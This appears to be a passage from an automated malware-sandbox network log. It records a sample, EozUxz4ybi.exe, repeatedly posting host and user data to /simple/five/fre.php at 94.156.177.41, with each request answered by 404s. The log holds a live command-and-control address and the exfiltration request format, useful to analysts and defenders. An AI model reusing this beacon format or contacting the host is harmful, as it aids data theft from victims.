                                Jan 11, 2025 01:43:50.991939068 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:51.718250990 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:51 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                97192.168.2.85138094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:51.867959023 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:51.872833014 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:52.589922905 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:52 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                98192.168.2.85138894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:53.006314039 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:53.011219025 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:53.747992039 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:53 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                99192.168.2.85139594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:53.899141073 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:53.904053926 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:54.614797115 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:54 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                100192.168.2.85140394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:54.758891106 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:54.763803959 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:55.488706112 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:55 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                101192.168.2.85140694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:55.921688080 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:55.926731110 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:56.636090994 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:56 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                102192.168.2.85141594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:56.794159889 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:56.799040079 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:57.548434019 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:57 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                103192.168.2.85142194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:57.701728106 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:57.706794024 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:58.432677984 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:58 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                104192.168.2.85142794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:58.601829052 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:58.606872082 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:43:59.293932915 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:43:59 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                105192.168.2.85143394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:43:59.453828096 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:43:59.461313009 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:00.168755054 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:00 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                106192.168.2.85143994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:00.322475910 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:00.327730894 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:01.029828072 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:00 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                107192.168.2.85144694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:01.201200962 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:01.206037045 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:01.910991907 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:01 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                108192.168.2.85145494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:02.061801910 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:02.066708088 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:02.787935972 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:02 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                109192.168.2.85145994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:03.046463013 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:03.052321911 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:03.775012016 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:03 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                110192.168.2.85146894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:03.933855057 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:03.938793898 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:04.664005041 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:04 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                111192.168.2.85147494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:04.869992018 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:04.874882936 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:05.575776100 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:05 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                112192.168.2.85148094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:05.895147085 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:05.900134087 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:06.644947052 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:06 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                113192.168.2.85148694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:06.789382935 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:06.794404030 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:07.690494061 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:07 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                114192.168.2.85149794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:07.837692022 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:07.842580080 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:08.542829037 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:08 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                115192.168.2.85150394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:08.803481102 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:08.809214115 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:09.524636984 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:09 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                116192.168.2.85150994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:09.686638117 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:44:09.691469908 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:44:10.389856100 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:44:10 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                117192.168.2.85151594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:44:10.549809933 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
